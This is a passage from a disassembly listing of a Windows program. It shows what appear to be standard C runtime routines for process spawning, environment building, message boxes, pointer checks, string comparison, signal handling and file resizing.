loc_434732: ; CODE XREF: sub_4346C4+53�j
push 19h
call sub_42DA80
pop ecx
lea eax, [esi-1]
jmp short loc_434757
; ---------------------------------------------------------------------------
loc_43473F: ; CODE XREF: sub_4346C4+2F�j
; sub_4346C4+5D�j
push 19h
call sub_42DA80
mov eax, [ebp+arg_4]
pop ecx
movzx ecx, bx
sub eax, ecx
neg eax
sbb eax, eax
not eax
and eax, esi
loc_434757: ; CODE XREF: sub_4346C4+1B�j
; sub_4346C4+6C�j ...
pop esi
pop ebx
pop ebp
retn
sub_4346C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43475B proc near ; CODE XREF: sub_4311A1+32�p
var_60 = dword ptr -60h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 60h
mov eax, [ebp+arg_0]
and [ebp+var_1], 0
push ebx
push esi
push edi
xor edi, edi
cmp eax, edi
mov [ebp+var_8], edi
jz short loc_434789
cmp eax, 1
jz short loc_434789
jle short loc_4347AB
cmp eax, 3
jle short loc_434789
cmp eax, 4
jnz short loc_4347AB
mov [ebp+var_1], 1
loc_434789: ; CODE XREF: sub_43475B+17�j
; sub_43475B+1C�j ...
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
loc_43478F: ; CODE XREF: sub_43475B+47�j
; sub_43475B+4E�j
mov cl, [eax]
test cl, cl
jz short loc_4347C2
loc_434795: ; CODE XREF: sub_43475B+3E�j
inc eax
cmp byte ptr [eax], 0
jnz short loc_434795
cmp byte ptr [eax+1], 0
lea ecx, [eax+1]
jz short loc_43478F
mov byte ptr [eax], 20h
mov eax, ecx
jmp short loc_43478F
; ---------------------------------------------------------------------------
loc_4347AB: ; CODE XREF: sub_43475B+1E�j
; sub_43475B+28�j
call sub_42F049
mov dword ptr [eax], 16h
call sub_42F052
mov [eax], edi
jmp loc_4348E6
; ---------------------------------------------------------------------------
loc_4347C2: ; CODE XREF: sub_43475B+38�j
push 44h
lea eax, [ebp+var_60]
pop esi
push esi
push edi
push eax
call sub_429690
mov [ebp+var_60], esi
mov esi, dword_676FC0
add esp, 0Ch
cmp esi, edi
jz short loc_434804
lea ecx, [esi-1]
loc_4347E3: ; CODE XREF: sub_43475B+A7�j
mov edx, ecx
mov eax, ecx
sar edx, 5
and eax, 1Fh
mov edx, dword_676EC0[edx*4]
lea eax, [eax+eax*8]
cmp byte ptr [edx+eax*4+4], 0
jnz short loc_434804
dec esi
dec ecx
cmp esi, edi
jnz short loc_4347E3
loc_434804: ; CODE XREF: sub_43475B+83�j
; sub_43475B+A1�j
lea eax, [esi+esi*4+4]
push 1
mov [ebp+var_2E], ax
movzx eax, ax
push eax
call sub_42B2CA
mov [ebp+var_2C], eax
pop ecx
mov [eax], esi
mov eax, [ebp+var_2C]
pop ecx
xor ebx, ebx
cmp esi, edi
lea ecx, [eax+4]
lea edx, [eax+esi+4]
jle short loc_434868
loc_43482E: ; CODE XREF: sub_43475B+106�j
mov edi, ebx
mov eax, ebx
sar edi, 5
and eax, 1Fh
mov edi, dword_676EC0[edi*4]
lea eax, [eax+eax*8]
lea edi, [edi+eax*4]
mov al, [edi+4]
test al, 10h
jnz short loc_434854
mov [ecx], al
mov eax, [edi]
mov [edx], eax
jmp short loc_43485A
; ---------------------------------------------------------------------------
loc_434854: ; CODE XREF: sub_43475B+EF�j
and byte ptr [ecx], 0
or dword ptr [edx], 0FFFFFFFFh
loc_43485A: ; CODE XREF: sub_43475B+F7�j
inc ebx
inc ecx
add edx, 4
cmp ebx, esi
jl short loc_43482E
mov eax, [ebp+var_2C]
xor edi, edi
loc_434868: ; CODE XREF: sub_43475B+D1�j
cmp [ebp+var_1], 0
jz short loc_43489B
lea ecx, [eax+4]
xor edx, edx
lea eax, [eax+esi+4]
loc_434877: ; CODE XREF: sub_43475B+137�j
cmp esi, 3
jge short loc_434880
mov ebx, esi
jmp short loc_434883
; ---------------------------------------------------------------------------
loc_434880: ; CODE XREF: sub_43475B+11F�j
push 3
pop ebx
loc_434883: ; CODE XREF: sub_43475B+123�j
cmp edx, ebx
jge short loc_434894
and byte ptr [ecx], 0
or dword ptr [eax], 0FFFFFFFFh
inc edx
inc ecx
add eax, 4
jmp short loc_434877
; ---------------------------------------------------------------------------
loc_434894: ; CODE XREF: sub_43475B+12A�j
mov [ebp+var_8], 8
loc_43489B: ; CODE XREF: sub_43475B+111�j
call sub_42F049
mov [eax], edi
call sub_42F052
mov [eax], edi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_60]
push eax
push edi
push [ebp+arg_C]
push [ebp+var_8]
push 1
push edi
push edi
push [ebp+var_C]
push [ebp+arg_4]
call dword_437188 ; CreateProcessA
mov esi, eax
call dword_43716C ; RtlGetLastWin32Error
push [ebp+var_2C]
mov ebx, eax
call sub_429822
cmp esi, edi
pop ecx
jnz short loc_4348EB
push ebx
call sub_42EFD6
pop ecx
loc_4348E6: ; CODE XREF: sub_43475B+62�j
or eax, 0FFFFFFFFh
jmp short loc_43493F
; ---------------------------------------------------------------------------
loc_4348EB: ; CODE XREF: sub_43475B+182�j
cmp [ebp+arg_0], 2
jnz short loc_4348F7
push edi
call sub_430A75
loc_4348F7: ; CODE XREF: sub_43475B+194�j
cmp [ebp+arg_0], edi
mov esi, dword_437044
jnz short loc_434921
push 0FFFFFFFFh
push [ebp+var_1C]
call dword_43707C ; WaitForSingleObject
lea eax, [ebp+arg_8]
push eax
push [ebp+var_1C]
call dword_4370F0 ; GetExitCodeProcess
push [ebp+var_1C]
call esi ; dword_437044
jmp short loc_434937
; ---------------------------------------------------------------------------
loc_434921: ; CODE XREF: sub_43475B+1A5�j
cmp [ebp+arg_0], 4
jnz short loc_434931
push [ebp+var_1C]
call esi ; dword_437044
mov [ebp+arg_8], edi
jmp short loc_434937
; ---------------------------------------------------------------------------
loc_434931: ; CODE XREF: sub_43475B+1CA�j
mov eax, [ebp+var_1C]
mov [ebp+arg_8], eax
loc_434937: ; CODE XREF: sub_43475B+1C4�j
; sub_43475B+1D4�j
push [ebp+var_18]
call esi ; dword_437044
mov eax, [ebp+arg_8]
loc_43493F: ; CODE XREF: sub_43475B+18E�j
pop edi
pop esi
pop ebx
leave
retn
sub_43475B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434944 proc near ; CODE XREF: sub_4311A1+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2
pop esi
mov edi, esi
loc_434952: ; CODE XREF: sub_434944+22�j
mov eax, [ebx]
test eax, eax
jz short loc_434968
push eax
add ebx, 4
call sub_4292D0
pop ecx
lea edi, [edi+eax+1]
jmp short loc_434952
; ---------------------------------------------------------------------------
loc_434968: ; CODE XREF: sub_434944+12�j
push edi
call sub_4296E8
pop ecx
mov ecx, [ebp+arg_8]
test eax, eax
mov [ecx], eax
jnz short loc_434983
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
jmp loc_434A65
; ---------------------------------------------------------------------------
loc_434983: ; CODE XREF: sub_434944+32�j
mov edi, [ebp+arg_4]
test edi, edi
jz short loc_4349A0
loc_43498A: ; CODE XREF: sub_434944+5A�j
mov eax, [edi]
test eax, eax
jz short loc_4349C7
push eax
add edi, 4
call sub_4292D0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_43498A
; ---------------------------------------------------------------------------
loc_4349A0: ; CODE XREF: sub_434944+44�j
mov eax, [ebp+arg_C]
mov ebx, [ebp+arg_C]
mov edi, [ebp+arg_C]
and dword ptr [eax], 0
loc_4349AC: ; CODE XREF: sub_434944+10D�j
mov eax, [ebp+arg_8]
mov esi, [eax]
mov eax, [ebp+arg_0]
mov [ebp+arg_8], eax
mov eax, [eax]
test eax, eax
jnz loc_434A83
loc_4349C1: ; CODE XREF: sub_434944+185�j
inc esi
jmp loc_434AA2
; ---------------------------------------------------------------------------
loc_4349C7: ; CODE XREF: sub_434944+4A�j
mov eax, dword_676904
test eax, eax
jnz short loc_4349E2
call sub_432E65
test eax, eax
mov dword_676904, eax
jz loc_434A7B
loc_4349E2: ; CODE XREF: sub_434944+8A�j
xor ebx, ebx
cmp [eax], bl
jz short loc_434A0B
mov edi, eax
mov cl, [edi]
loc_4349EC: ; CODE XREF: sub_434944+C5�j
cmp cl, 3Dh
jz short loc_434A0B
push edi
call sub_4292D0
lea ebx, [ebx+eax+1]
mov eax, dword_676904
pop ecx
mov cl, [eax+ebx]
lea edi, [eax+ebx]
test cl, cl
jnz short loc_4349EC
loc_434A0B: ; CODE XREF: sub_434944+A2�j
; sub_434944+AB�j
mov edi, ebx
add eax, ebx
loc_434A0F: ; CODE XREF: sub_434944+F7�j
cmp byte ptr [eax], 3Dh
jnz short loc_434A3D
cmp byte ptr [eax+1], 0
jz short loc_434A3D
cmp byte ptr [eax+2], 3Ah
jnz short loc_434A3D
cmp byte ptr [eax+3], 3Dh
jnz short loc_434A3D
add eax, 4
push eax
call sub_4292D0
lea edi, [edi+eax+5]
mov eax, dword_676904
pop ecx
add eax, edi
jmp short loc_434A0F
; ---------------------------------------------------------------------------
loc_434A3D: ; CODE XREF: sub_434944+CE�j
; sub_434944+D4�j ...
mov eax, edi
sub eax, ebx
add eax, esi
push eax
call sub_4296E8
pop ecx
mov ecx, [ebp+arg_C]
test eax, eax
mov [ecx], eax
jnz loc_4349AC
mov esi, [ebp+arg_8]
push dword ptr [esi]
call sub_429822
and dword ptr [esi], 0
pop ecx
loc_434A65: ; CODE XREF: sub_434944+3A�j
call sub_42F049
mov dword ptr [eax], 0Ch
call sub_42F052
mov dword ptr [eax], 8
loc_434A7B: ; CODE XREF: sub_434944+98�j
or eax, 0FFFFFFFFh
jmp loc_434B45
; ---------------------------------------------------------------------------
loc_434A83: ; CODE XREF: sub_434944+77�j
push eax
push esi
call sub_42A500
mov eax, [ebp+arg_0]
mov ecx, [eax]
add eax, 4
push ecx
mov [ebp+arg_8], eax
call sub_4292D0
add esp, 0Ch
lea esi, [esi+eax+1]
loc_434AA2: ; CODE XREF: sub_434944+7E�j
mov eax, [ebp+arg_8]
mov eax, [eax]
test eax, eax
jz short loc_434ACE
push eax
push esi
call sub_42A500
mov eax, [ebp+arg_8]
add [ebp+arg_8], 4
mov eax, [eax]
push eax
call sub_4292D0
add esp, 0Ch
add esi, eax
mov byte ptr [esi], 20h
jmp loc_4349C1
; ---------------------------------------------------------------------------
loc_434ACE: ; CODE XREF: sub_434944+165�j
mov eax, [ebp+arg_C]
and byte ptr [esi-1], 0
and byte ptr [esi], 0
cmp [ebp+arg_4], 0
mov esi, [eax]
jz short loc_434B1E
mov eax, edi
sub eax, ebx
push eax
mov eax, dword_676904
add eax, ebx
push eax
push esi
call sub_429350
sub edi, ebx
add esp, 0Ch
add esi, edi
mov edi, [ebp+arg_4]
loc_434AFD: ; CODE XREF: sub_434944+1D8�j
mov eax, [edi]
test eax, eax
jz short loc_434B1E
push eax
push esi
call sub_42A500
mov eax, [edi]
add edi, 4
push eax
call sub_4292D0
add esp, 0Ch
lea esi, [esi+eax+1]
jmp short loc_434AFD
; ---------------------------------------------------------------------------
loc_434B1E: ; CODE XREF: sub_434944+19A�j
; sub_434944+1BD�j
test esi, esi
jz short loc_434B30
mov eax, [ebp+arg_C]
cmp esi, [eax]
jnz short loc_434B2D
and byte ptr [esi], 0
inc esi
loc_434B2D: ; CODE XREF: sub_434944+1E3�j
and byte ptr [esi], 0
loc_434B30: ; CODE XREF: sub_434944+1DC�j
push dword_676904
call sub_429822
and dword_676904, 0
pop ecx
xor eax, eax
loc_434B45: ; CODE XREF: sub_434944+13A�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_434944 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434B4A proc near ; CODE XREF: sub_431213+5E�p
; sub_435E44+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jnz short loc_434B57
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_434B57: ; CODE XREF: sub_434B4A+7�j
push dword_676C7C
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push dword_676EA4
call sub_435A15
add esp, 1Ch
test eax, eax
jnz short loc_434B84
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_434B84: ; CODE XREF: sub_434B4A+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_434B4A endp
; =============== S U B R O U T I N E =======================================
sub_434B89 proc near ; CODE XREF: sub_431213+1E�p
; sub_435CBD+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, dword_6769D4
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_434BEA
mov ebx, dword_437074
loc_434BA2: ; CODE XREF: sub_434B89+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx ; dword_437074
mov ebp, eax
cmp ebp, edi
jz short loc_434BF2
push ebp
call sub_4296E8
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_434BF2
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx ; dword_437074
test eax, eax
jz short loc_434BF2
push edi
push [esp+18h+var_4]
call sub_435CBD
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_434BA2
loc_434BEA: ; CODE XREF: sub_434B89+11�j
xor eax, eax
loc_434BEC: ; CODE XREF: sub_434B89+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_434BF2: ; CODE XREF: sub_434B89+29�j
; sub_434B89+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_434BEC
sub_434B89 endp
; =============== S U B R O U T I N E =======================================
sub_434BF7 proc near ; CODE XREF: sub_43132B+77�p
; sub_431859+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call dword_4371AC ; IsBadReadPtr
test eax, eax
jz short loc_434C0F
xor esi, esi
loc_434C0F: ; CODE XREF: sub_434BF7+14�j
mov eax, esi
pop esi
retn
sub_434BF7 endp
; =============== S U B R O U T I N E =======================================
sub_434C13 proc near ; CODE XREF: sub_431859+73�p
; sub_431859+BF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call dword_437158 ; IsBadWritePtr
test eax, eax
jz short loc_434C2B
xor esi, esi
loc_434C2B: ; CODE XREF: sub_434C13+14�j
mov eax, esi
pop esi
retn
sub_434C13 endp
; =============== S U B R O U T I N E =======================================
sub_434C2F proc near ; CODE XREF: sub_431859+15B�p
; sub_431FD0+2D�p
arg_0 = dword ptr 4
push esi
push 1
pop esi
push [esp+4+arg_0]
call dword_4371A8 ; IsBadCodePtr
test eax, eax
jz short loc_434C43
xor esi, esi
loc_434C43: ; CODE XREF: sub_434C2F+10�j
mov eax, esi
pop esi
retn
sub_434C2F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431AFC
loc_434C47: ; CODE XREF: sub_431AFC:loc_431B58�j
push 0Ah
call sub_432FD0
push 16h
call sub_434F51
pop ecx
pop ecx
push 3
call sub_430A75
; END OF FUNCTION CHUNK FOR sub_431AFC
; =============== S U B R O U T I N E =======================================
sub_434C5E proc near ; CODE XREF: sub_432B07+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_434C6F
add esp, 0Ch
retn
sub_434C5E endp
; =============== S U B R O U T I N E =======================================
sub_434C6F proc near ; CODE XREF: sub_434C5E+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_676DA1[eax], cl
jnz short loc_434C9C
cmp [esp+arg_4], 0
jz short loc_434C95
movzx eax, word_4533A2[eax*2]
and eax, [esp+arg_4]
jmp short loc_434C97
; ---------------------------------------------------------------------------
loc_434C95: ; CODE XREF: sub_434C6F+16�j
xor eax, eax
loc_434C97: ; CODE XREF: sub_434C6F+24�j
test eax, eax
jnz short loc_434C9C
retn
; ---------------------------------------------------------------------------
loc_434C9C: ; CODE XREF: sub_434C6F+F�j
; sub_434C6F+2A�j
push 1
pop eax
retn
sub_434C6F endp
; =============== S U B R O U T I N E =======================================
sub_434CA0 proc near ; CODE XREF: sub_432FD0+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_676C38, ebx
push esi
push edi
jnz short loc_434CEF
push offset aUser32_dll ; "user32.dll"
call dword_437034 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_434D25
mov esi, dword_437030
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; dword_437030
test eax, eax
mov dword_676C38, eax
jz short loc_434D25
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; dword_437030
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_676C3C, eax
call esi ; dword_437030
mov dword_676C40, eax
loc_434CEF: ; CODE XREF: sub_434CA0+B�j
mov eax, dword_676C3C
test eax, eax
jz short loc_434D0E
call eax ; dword_676C3C
mov ebx, eax
test ebx, ebx
jz short loc_434D0E
mov eax, dword_676C40
test eax, eax
jz short loc_434D0E
push ebx
call eax ; dword_676C40
mov ebx, eax
loc_434D0E: ; CODE XREF: sub_434CA0+56�j
; sub_434CA0+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_676C38 ; MessageBoxA
loc_434D21: ; CODE XREF: sub_434CA0+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_434D25: ; CODE XREF: sub_434CA0+1C�j
; sub_434CA0+33�j
xor eax, eax
jmp short loc_434D21
sub_434CA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434D29 proc near ; CODE XREF: sub_4335E9+28A�p
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1004h
call sub_429A90
push ebx
push esi
xor esi, esi
push 1
push esi
push [ebp+arg_0]
call sub_42F84D
or ebx, 0FFFFFFFFh
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jz loc_434E48
push 2
push esi
push [ebp+arg_0]
call sub_42F84D
add esp, 0Ch
cmp eax, ebx
jz loc_434E48
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_434DEB
mov ebx, 1000h
lea eax, [ebp+var_1004]
push ebx
push esi
push eax
call sub_429690
push 8000h
push [ebp+arg_0]
call sub_435F03
add esp, 14h
mov [ebp+arg_4], eax
loc_434D9C: ; CODE XREF: sub_434D29+99�j
cmp edi, ebx
mov eax, ebx
jge short loc_434DA4
mov eax, edi
loc_434DA4: ; CODE XREF: sub_434D29+77�j
push eax
lea eax, [ebp+var_1004]
push eax
push [ebp+arg_0]
call sub_432431
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_434DC4
sub edi, eax
test edi, edi
jle short loc_434DDC
jmp short loc_434D9C
; ---------------------------------------------------------------------------
loc_434DC4: ; CODE XREF: sub_434D29+91�j
call sub_42F052
cmp dword ptr [eax], 5
jnz short loc_434DD9
call sub_42F049
mov dword ptr [eax], 0Dh
loc_434DD9: ; CODE XREF: sub_434D29+A3�j
or esi, 0FFFFFFFFh
loc_434DDC: ; CODE XREF: sub_434D29+97�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_435F03
pop ecx
pop ecx
jmp short loc_434E33
; ---------------------------------------------------------------------------
loc_434DEB: ; CODE XREF: sub_434D29+4B�j
jge short loc_434E33
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42F84D
push [ebp+arg_0]
call sub_432309
add esp, 10h
push eax
call dword_4371A4 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, ebx
jnz short loc_434E33
call sub_42F049
mov dword ptr [eax], 0Dh
call dword_43716C ; RtlGetLastWin32Error
mov edi, eax
call sub_42F052
mov [eax], edi
loc_434E33: ; CODE XREF: sub_434D29+C0�j
; sub_434D29:loc_434DEB�j ...
push 0
push [ebp+var_4]
push [ebp+arg_0]
call sub_42F84D
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_434E4A
; ---------------------------------------------------------------------------
loc_434E48: ; CODE XREF: sub_434D29+27�j
; sub_434D29+3D�j
mov eax, ebx
loc_434E4A: ; CODE XREF: sub_434D29+11D�j
pop esi
pop ebx
leave
retn
sub_434D29 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+10h]
or ecx, ecx
jz loc_434F4A
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
lea eax, dword_676980
cmp dword ptr [eax+8], 0
jnz short loc_434EC1
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_434E7C: ; CODE XREF: .text:00434EA3�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_434EA5
or al, al
jz short loc_434EA5
inc esi
inc edi
cmp ah, bh
jb short loc_434E94
cmp ah, bl
ja short loc_434E94
add ah, dh
loc_434E94: ; CODE XREF: .text:00434E8C�j
; .text:00434E90�j
cmp al, bh
jb short loc_434E9E
cmp al, bl
ja short loc_434E9E
add al, dh
loc_434E9E: ; CODE XREF: .text:00434E96�j
; .text:00434E9A�j
cmp ah, al
jnz short loc_434EAF
dec ecx
jnz short loc_434E7C
loc_434EA5: ; CODE XREF: .text:00434E82�j
; .text:00434E86�j
xor ecx, ecx
cmp ah, al
jz loc_434F4A
loc_434EAF: ; CODE XREF: .text:00434EA0�j
mov ecx, 0FFFFFFFFh
jb loc_434F4A
neg ecx
jmp loc_434F4A
; ---------------------------------------------------------------------------
loc_434EC1: ; CODE XREF: .text:00434E71�j
lock inc dword_676EBC
cmp dword_676EB8, 0
jg short loc_434ED5
push 0
jmp short loc_434EEE
; ---------------------------------------------------------------------------
loc_434ED5: ; CODE XREF: .text:00434ECF�j
lock dec dword_676EBC
mov ebx, ecx
push 13h
call sub_42DA1F
mov dword ptr [esp], 1
mov ecx, ebx
loc_434EEE: ; CODE XREF: .text:00434ED3�j
xor eax, eax
xor ebx, ebx
mov edi, edi
loc_434EF4: ; CODE XREF: .text:00434F1D�j
mov al, [esi]
or eax, eax
mov bl, [edi]
jz short loc_434F1F
or ebx, ebx
jz short loc_434F1F
inc esi
inc edi
push ecx
push eax
push ebx
call sub_4304CD
mov ebx, eax
add esp, 4
call sub_4304CD
add esp, 4
pop ecx
cmp eax, ebx
jnz short loc_434F25
dec ecx
jnz short loc_434EF4
loc_434F1F: ; CODE XREF: .text:00434EFA�j
; .text:00434EFE�j
xor ecx, ecx
cmp eax, ebx
jz short loc_434F2E
loc_434F25: ; CODE XREF: .text:00434F1A�j
mov ecx, 0FFFFFFFFh
jb short loc_434F2E
neg ecx
loc_434F2E: ; CODE XREF: .text:00434F23�j
; .text:00434F2A�j
pop eax
or eax, eax
jnz short loc_434F3C
lock dec dword_676EBC
jmp short loc_434F4A
; ---------------------------------------------------------------------------
loc_434F3C: ; CODE XREF: .text:00434F31�j
mov ebx, ecx
push 13h
call sub_42DA80
add esp, 4
mov ecx, ebx
loc_434F4A: ; CODE XREF: .text:00434E5B�j
; .text:00434EA9�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434F51 proc near ; CODE XREF: sub_431AFC+3154�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
and [ebp+var_4], 0
dec eax
push ebx
push esi
dec eax
push edi
jz short loc_434FCC
dec eax
dec eax
jz short loc_434FAF
sub eax, 4
jz short loc_434FAF
sub eax, 3
jz short loc_434FAF
sub eax, 4
jz short loc_434FA2
sub eax, 6
jz short loc_434F95
dec eax
jz short loc_434F88
or eax, 0FFFFFFFFh
jmp loc_4350CE
; ---------------------------------------------------------------------------
loc_434F88: ; CODE XREF: sub_434F51+2D�j
mov ebx, dword_676C60
mov edi, offset dword_676C60
jmp short loc_434FD7
; ---------------------------------------------------------------------------
loc_434F95: ; CODE XREF: sub_434F51+2A�j
mov ebx, dword_676C5C
mov edi, offset dword_676C5C
jmp short loc_434FD7
; ---------------------------------------------------------------------------
loc_434FA2: ; CODE XREF: sub_434F51+25�j
mov ebx, dword_676C64
mov edi, offset dword_676C64
jmp short loc_434FD7
; ---------------------------------------------------------------------------
loc_434FAF: ; CODE XREF: sub_434F51+16�j
; sub_434F51+1B�j ...
call sub_42E41E
mov esi, eax
push dword ptr [esi+50h]
push [ebp+arg_0]
call sub_4350D3
mov edi, eax
pop ecx
add edi, 8
pop ecx
mov ebx, [edi]
jmp short loc_434FE9
; ---------------------------------------------------------------------------
loc_434FCC: ; CODE XREF: sub_434F51+12�j
mov ebx, dword_676C58
mov edi, offset dword_676C58
loc_434FD7: ; CODE XREF: sub_434F51+42�j
; sub_434F51+4F�j ...
push 1
mov [ebp+var_4], 1
call sub_42DA1F
mov esi, [ebp+arg_0]
pop ecx
loc_434FE9: ; CODE XREF: sub_434F51+79�j
cmp ebx, 1
jnz short loc_435004
cmp [ebp+var_4], 0
jz loc_4350CC
push ebx
call sub_42DA80
pop ecx
jmp loc_4350CC
; ---------------------------------------------------------------------------
loc_435004: ; CODE XREF: sub_434F51+9B�j
xor ecx, ecx
cmp ebx, ecx
jnz short loc_43501E
cmp [ebp+var_4], ecx
jz short loc_435017
push 1
call sub_42DA80
pop ecx
loc_435017: ; CODE XREF: sub_434F51+BC�j
push 3
call sub_430A75
loc_43501E: ; CODE XREF: sub_434F51+B7�j
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_435030
cmp eax, 0Bh
jz short loc_435030
cmp eax, 4
jnz short loc_43504B
loc_435030: ; CODE XREF: sub_434F51+D3�j
; sub_434F51+D8�j
mov edx, [esi+54h]
cmp eax, 8
mov [ebp+var_8], edx
mov [esi+54h], ecx
jnz short loc_435087
mov edx, [esi+58h]
mov dword ptr [esi+58h], 8Ch
loc_435048: ; DATA XREF: .text:0043DA68�o
mov [ebp+var_C], edx
loc_43504B: ; CODE XREF: sub_434F51+DD�j
cmp eax, 8
jnz short loc_435087
mov ecx, dword_453890
mov eax, dword_453894
add eax, ecx
cmp ecx, eax
jge short loc_435089
lea eax, [ecx+ecx*2]
shl eax, 2
loc_435067: ; CODE XREF: sub_434F51+132�j
mov edx, [esi+50h]
add eax, 0Ch
and dword ptr [edx+eax-4], 0
mov edx, dword_453890
mov edi, dword_453894
inc ecx
add edi, edx
cmp ecx, edi
jl short loc_435067
jmp short loc_435089
; ---------------------------------------------------------------------------
loc_435087: ; CODE XREF: sub_434F51+EB�j
; sub_434F51+FD�j
mov [edi], ecx
loc_435089: ; CODE XREF: sub_434F51+10E�j
; sub_434F51+134�j
cmp [ebp+var_4], 0
jz short loc_435097
push 1
call sub_42DA80
pop ecx
loc_435097: ; CODE XREF: sub_434F51+13C�j
cmp [ebp+arg_0], 8
jnz short loc_4350A8
push dword ptr [esi+58h]
push 8
call ebx
pop ecx
pop ecx
jmp short loc_4350BA
; ---------------------------------------------------------------------------
loc_4350A8: ; CODE XREF: sub_434F51+14A�j
push [ebp+arg_0]
call ebx
cmp [ebp+arg_0], 0Bh
pop ecx
jz short loc_4350BA
cmp [ebp+arg_0], 4
jnz short loc_4350CC
loc_4350BA: ; CODE XREF: sub_434F51+155�j
; sub_434F51+161�j
mov eax, [ebp+var_8]
cmp [ebp+arg_0], 8
mov [esi+54h], eax
jnz short loc_4350CC
mov eax, [ebp+var_C]
mov [esi+58h], eax
loc_4350CC: ; CODE XREF: sub_434F51+A1�j
; sub_434F51+AE�j ...
xor eax, eax
loc_4350CE: ; CODE XREF: sub_434F51+32�j
pop edi
pop esi
pop ebx
leave
retn
sub_434F51 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4350D3 proc near ; CODE XREF: sub_434F51+6B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov ecx, dword_45389C
push esi
mov esi, [esp+4+arg_0]
cmp [edx+4], esi
push edi
mov eax, edx
jz short loc_4350FC
lea edi, [ecx+ecx*2]
lea edi, [edx+edi*4]
loc_4350F0: ; CODE XREF: sub_4350D3+27�j
add eax, 0Ch
cmp eax, edi
jnb short loc_4350FC
cmp [eax+4], esi
jnz short loc_4350F0
loc_4350FC: ; CODE XREF: sub_4350D3+15�j
; sub_4350D3+22�j
lea ecx, [ecx+ecx*2]
lea ecx, [edx+ecx*4]
cmp eax, ecx
jnb short loc_43510B
cmp [eax+4], esi
jz short loc_43510D
loc_43510B: ; CODE XREF: sub_4350D3+31�j
xor eax, eax
